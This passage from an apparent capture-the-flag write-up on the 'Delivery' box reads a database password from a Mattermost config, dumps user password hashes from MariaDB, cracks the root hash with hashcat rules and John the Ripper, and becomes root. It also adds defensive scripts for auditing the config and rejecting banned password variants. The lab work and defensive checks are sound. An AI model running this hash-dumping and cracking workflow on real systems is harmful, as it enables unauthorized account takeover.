        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    }
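
What a defender would check in this file, as an added example that is not part of the original writeup and not Mattermost's own tooling: the permission bits from the ls -lta output, the clear-text password inside the Go MySQL driver DSN, and a few of the settings shown above. The function names, finding ids and the choice of checks are assumptions made for illustration.

```python
import json
import re
import stat

# Go MySQL driver DSN layout: user:password@protocol(address)/dbname?params
DSN_RE = re.compile(
    r"^(?P<user>[^:@/]*)(?::(?P<password>.*))?@"
    r"(?P<proto>[^(]*)\((?P<addr>[^)]*)\)/(?P<db>[^?]*)(?:\?.*)?$"
)

# Excerpt of the config.json shown above (values copied from the page).
SAMPLE_CONFIG = r"""
{
  "ServiceSettings": {"ListenAddress": ":8065", "ConnectionSecurity": "",
                      "EnableMultifactorAuthentication": false},
  "TeamSettings": {"EnableOpenServer": true, "RestrictCreationToDomains": ""},
  "SqlSettings": {"DriverName": "mysql",
    "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s"}
}
"""
SAMPLE_MODE = 0o100664  # -rw-rw-r-- as in the ls -lta output above


def redact_dsn(dsn):
    """Return the DSN with any inline password replaced by '***'."""
    m = DSN_RE.match(dsn)
    if not m or not m.group("password"):
        return dsn
    start, end = m.span("password")
    return dsn[:start] + "***" + dsn[end:]


def audit_mode(mode):
    """Flag permission bits that expose the file to every local account."""
    findings = []
    if mode & stat.S_IROTH:
        findings.append(("MODE_WORLD_READABLE",
                         "any local user can read the secrets in this file"))
    if mode & stat.S_IWOTH:
        findings.append(("MODE_WORLD_WRITABLE",
                         "any local user can rewrite the server configuration"))
    return findings


def audit_config(cfg):
    """Return (id, detail) findings for the settings discussed on this page."""
    findings = []
    sql = cfg.get("SqlSettings", {})
    m = DSN_RE.match(sql.get("DataSource", ""))
    if m and m.group("password"):
        findings.append(("DSN_INLINE_PASSWORD",
                         "clear-text database password for '%s': %s"
                         % (m.group("user"), redact_dsn(sql["DataSource"]))))
    svc = cfg.get("ServiceSettings", {})
    if not svc.get("ConnectionSecurity"):
        findings.append(("NO_TLS", "listener %s serves plain HTTP itself"
                         % svc.get("ListenAddress", "?")))
    if not svc.get("EnableMultifactorAuthentication", False):
        findings.append(("MFA_DISABLED", "multi-factor authentication is off"))
    team = cfg.get("TeamSettings", {})
    if team.get("EnableOpenServer") and not team.get("RestrictCreationToDomains"):
        findings.append(("OPEN_SIGNUP",
                         "self-registration has no domain restriction"))
    return findings


def audit(config_text, mode):
    """Run both checks and return the finding ids in report order."""
    found = audit_mode(mode) + audit_config(json.loads(config_text))
    return [fid for fid, _ in found]


if __name__ == "__main__":
    report = audit_mode(SAMPLE_MODE) + audit_config(json.loads(SAMPLE_CONFIG))
    for fid, detail in report:
        print("%-22s %s" % (fid, detail))
```

To audit a live file, pass os.stat(path).st_mode and the file's text to audit(); the report prints the DSN only in redacted form.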

Let's log in to MySQL. (The password is Crack_The_MM_Admin_PW)

maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 141
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

We are now inside the MariaDB monitor. Let's explore.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mattermost         |
+--------------------+
2 rows in set (0.000 sec)

MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mattermost]> SHOW tables;
+------------------------+
| Tables_in_mattermost   |
+------------------------+
| Audits                 |
| Bots                   |
| ChannelMemberHistory   |
| ChannelMembers         |
| Channels               |
| ClusterDiscovery       |
| CommandWebhooks        |
| Commands               |
| Compliances            |
| Emoji                  |
| FileInfo               |
| GroupChannels          |
| GroupMembers           |
| GroupTeams             |
| IncomingWebhooks       |
| Jobs                   |
| Licenses               |
| LinkMetadata           |
| OAuthAccessData        |
| OAuthApps              |
| OAuthAuthData          |
| OutgoingWebhooks       |
| PluginKeyValueStore    |
| Posts                  |
| Preferences            |
| ProductNoticeViewState |
| PublicChannels         |
| Reactions              |
| Roles                  |
| Schemes                |
| Sessions               |
| SidebarCategories      |
| SidebarChannels        |
| Status                 |
| Systems                |
| TeamMembers            |
| Teams                  |
| TermsOfService         |
| ThreadMemberships      |
| Threads                |
| Tokens                 |
| UploadSessions         |
| UserAccessTokens       |
| UserGroups             |
| UserTermsOfService     |
| Users                  |
+------------------------+
46 rows in set (0.001 sec)

MariaDB [mattermost]> describe Users;
+--------------------+--------------+------+-----+---------+-------+
| Field              | Type         | Null | Key | Default | Extra |
+--------------------+--------------+------+-----+---------+-------+
| Id                 | varchar(26)  | NO   | PRI | NULL    |       |
| CreateAt           | bigint(20)   | YES  | MUL | NULL    |       |
| UpdateAt           | bigint(20)   | YES  | MUL | NULL    |       |
| DeleteAt           | bigint(20)   | YES  | MUL | NULL    |       |
| Username           | varchar(64)  | YES  | UNI | NULL    |       |
| Password           | varchar(128) | YES  |     | NULL    |       |
| AuthData           | varchar(128) | YES  | UNI | NULL    |       |
| AuthService        | varchar(32)  | YES  |     | NULL    |       |
| Email              | varchar(128) | YES  | UNI | NULL    |       |
| EmailVerified      | tinyint(1)   | YES  |     | NULL    |       |
| Nickname           | varchar(64)  | YES  |     | NULL    |       |
| FirstName          | varchar(64)  | YES  |     | NULL    |       |
| LastName           | varchar(64)  | YES  |     | NULL    |       |
| Position           | varchar(128) | YES  |     | NULL    |       |
| Roles              | text         | YES  |     | NULL    |       |
| AllowMarketing     | tinyint(1)   | YES  |     | NULL    |       |
| Props              | text         | YES  |     | NULL    |       |
| NotifyProps        | text         | YES  |     | NULL    |       |
| LastPasswordUpdate | bigint(20)   | YES  |     | NULL    |       |
| LastPictureUpdate  | bigint(20)   | YES  |     | NULL    |       |
| FailedAttempts     | int(11)      | YES  |     | NULL    |       |
| Locale             | varchar(5)   | YES  |     | NULL    |       |
| Timezone           | text         | YES  |     | NULL    |       |
| MfaActive          | tinyint(1)   | YES  |     | NULL    |       |
| MfaSecret          | varchar(128) | YES  |     | NULL    |       |
+--------------------+--------------+------+-----+---------+-------+
25 rows in set (0.001 sec)

The interesting columns here are id, username and password. Let's extract them.

MariaDB [mattermost]> select id, username, password from Users;
+----------------------------+----------------------------------+--------------------------------------------------------------+
| id                         | username                         | password                                                     |
+----------------------------+----------------------------------+--------------------------------------------------------------+
| 64nq8nue7pyhpgwm99a949mwya | surveybot                        |                                                              |
| 6akd5cxuhfgrbny81nj55au4za | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 6wkx1ggn63r7f8q1hpzp7t4iiy | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| dijg7mcf4tf3xrgxi5ntqdefma | root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| e4i5d8rdwibcmgm35r5j3jxejh | limitedchan                      | $2a$10$K.q13JU.kZOMQWLW9IU8b.k8009yJMzan8tLREiZxhQw5aV.3TaNK |
| hatotzdacb8mbe95hm4ei8i7ny | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| jing8rk6mjdbudcidw6wz94rdy | channelexport                    |                                                              |
| n9magehhzincig4mm97xyft9sc | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+----------------------------+----------------------------------+--------------------------------------------------------------+
8 rows in set (0.001 sec)

We can find the password hash for root.

Hashcat

Based on the earlier chat log and the content of ③, we create a wordlist with Hashcat.

Please create a program to help us stop re-using the same passwords everywhere... especially those that are a variant of "PleaseSubscribe!"

PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.

┌──(kali㉿kali)-[~/Desktop/work]
└─$ touch pass.txt
                                                                                
┌──(kali㉿kali)-[~/Desktop/work]
└─$ vi pass.txt
                                                                                
┌──(kali㉿kali)-[~/Desktop/work]
└─$ cat pass.txt 
PleaseSubscribe!
                                                                                
┌──(kali㉿kali)-[~/Desktop/work]
└─$ hashcat --stdout --force pass.txt -r /usr/share/hashcat/rules/best64.rule > passwordlist.txt

The resulting list looks like this.

┌──(kali㉿kali)-[~/Desktop/work]
└─$ cat passwordlist.txt 
PleaseSubscribe!
!ebircsbuSesaelP
PLEASESUBSCRIBE!
pleaseSubscribe!
PleaseSubscribe!0
PleaseSubscribe!1
PleaseSubscribe!2
PleaseSubscribe!3
PleaseSubscribe!4
PleaseSubscribe!5
PleaseSubscribe!6
PleaseSubscribe!7
PleaseSubscribe!8
PleaseSubscribe!9
PleaseSubscribe!00
PleaseSubscribe!01
PleaseSubscribe!02
PleaseSubscribe!11
PleaseSubscribe!12
PleaseSubscribe!13
PleaseSubscribe!21
PleaseSubscribe!22
PleaseSubscribe!23
PleaseSubscribe!69
PleaseSubscribe!77
PleaseSubscribe!88
PleaseSubscribe!99
PleaseSubscribe!123
PleaseSubscribe!e
PleaseSubscribe!s
PleaseSubscribea
PleaseSubscribs
PleaseSubscriba
PleaseSubscriber
PleaseSubscribie
PleaseSubscrio
PleaseSubscriy
PleaseSubscri123
PleaseSubscriman
PleaseSubscridog
1PleaseSubscribe!
thePleaseSubscribe!
dleaseSubscribe!
maeaseSubscribe!
PleaseSubscribe!
PleaseSubscr1be!
Pl3as3Subscrib3!
PlaseSubscribe!
PlseSubscribe!
PleseSubscribe!
PleaeSubscribe!
Ples
Pleas1
PleaseSubscribe
PleaseSubscrib
PleaseSubscri
PleaseSubscriPleaseSubscri
PeaseSubscri
ribe
bscribe!easeSu
PleaseSubscri!
dleaseSubscrib
be!PleaseSubscri
ibe!
ribe!
cribcrib
tlea
asPasP
XleaseSubscribe!
SaseSubscribe!
PleaSu
PlesPles
asP
PlcrPlcr
PcSu
PleasS
PeSubs

Save the root password hash under the name rootpass.

┌──(kali㉿kali)-[~/Desktop/work]
└─$ touch rootpass.txt
                                                                                                                   
┌──(kali㉿kali)-[~/Desktop/work]
└─$ vi rootpass.txt 
                                                                                                                   
┌──(kali㉿kali)-[~/Desktop/work]
└─$ cat rootpass.txt 
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO

John - Dictionary Attack

This time I used John the Ripper, but if you are more comfortable with Hashcat, that works just as well.

┌──(kali㉿kali)-[~/Desktop/work]
└─$ john --wordlist=passwordlist.txt rootpass.txt
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X2])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
PleaseSubscribe!21 (?)     
1g 0:00:00:00 DONE (2023-12-23 07:41) 1.388g/s 33.33p/s 33.33c/s 33.33C/s PleaseSubscribe!8..PleaseSubscribe!69
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

The password turns out to be PleaseSubscribe!21. Switch to the root user.

maildeliverer@Delivery:~$ su root
Password: 
root@Delivery:/home/maildeliverer# whoami
root

The command returns root. We can also grab the root flag.

root@Delivery:/home/maildeliverer# cd
root@Delivery:~# ls -lta
total 44
-r--------  1 root root   33 Dec 26 11:01 root.txt
drwx------  5 root root 4096 Dec 26 11:01 .
drwxr-xr-x 19 root root 4096 Jul 14  2021 ..
drwxr-xr-x  3 root root 4096 Jul 14  2021 .cache
drwxr-xr-x  2 root root 4096 Jul 14  2021 .vim
drwx------  3 root root 4096 Jul 14  2021 .gnupg
lrwxrwxrwx  1 root root    9 Dec 28  2020 .bash_history -> /dev/null
-r--------  1 root root  382 Dec 28  2020 note.txt
-rwxr-x---  1 root root  103 Dec 26  2020 mail.sh
-rw-r-----  1 root root 1499 Dec 26  2020 py-smtp.py
-rw-r-----  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
root@Delivery:~# cat root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32-character root flag
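
The chat message quoted in the Hashcat section asks for a program that stops people choosing variants of "PleaseSubscribe!"; the check below is one way to do that at password-change time, added here and not part of the original writeup. The leetspeak table, the distance threshold of 2 and all function names are assumptions, and the sample candidates are lines from the passwordlist.txt output above.

```python
import re

# Banned base phrases; "PleaseSubscribe!" is the one named in the chat log.
BANNED = ["PleaseSubscribe!"]
# Leetspeak substitutions undone during normalisation (assumed mapping).
LEET = str.maketrans("013457@$", "oieastas")

def normalise(password):
    """Lower-case, strip digits/symbols from both ends, undo leetspeak."""
    s = re.sub(r"^[\d\W_]+|[\d\W_]+$", "", password.lower())
    return re.sub(r"[^a-z]", "", s.translate(LEET))

def edit_distance(a, b):
    """Levenshtein distance, computed one row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def is_banned_variant(password, banned=BANNED, max_distance=2):
    """True if the password reduces to (nearly) a banned phrase."""
    core = normalise(password)
    for phrase in banned:
        base = normalise(phrase)
        # The rule output above also contains the reversed phrase.
        for form in (core, core[::-1]):
            if base in form or edit_distance(form, base) <= max_distance:
                return True
    return False

def screen(candidates):
    """Return the candidates a password-change form should reject."""
    return [c for c in candidates if is_banned_variant(c)]

if __name__ == "__main__":
    sample = ["PleaseSubscribe!21", "Pl3as3Subscrib3!", "!ebircsbuSesaelP",
              "thePleaseSubscribe!", "PleaseSubscri", "correct-horse-battery-staple"]
    for pw in sample:
        print(("REJECT " if is_banned_variant(pw) else "accept ") + pw)
```

The bcrypt cost of 10 shown in the John output did not help here because the candidate list was only a few dozen lines long; rejecting near-variants at the time the password is set is what removes that shortcut.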

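Afterword

This box was not primarily about exploiting a vulnerability, so it felt different from the usual ones and was very distinctive. It was also a good review of SQL, Hashcat, and John the Ripper.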
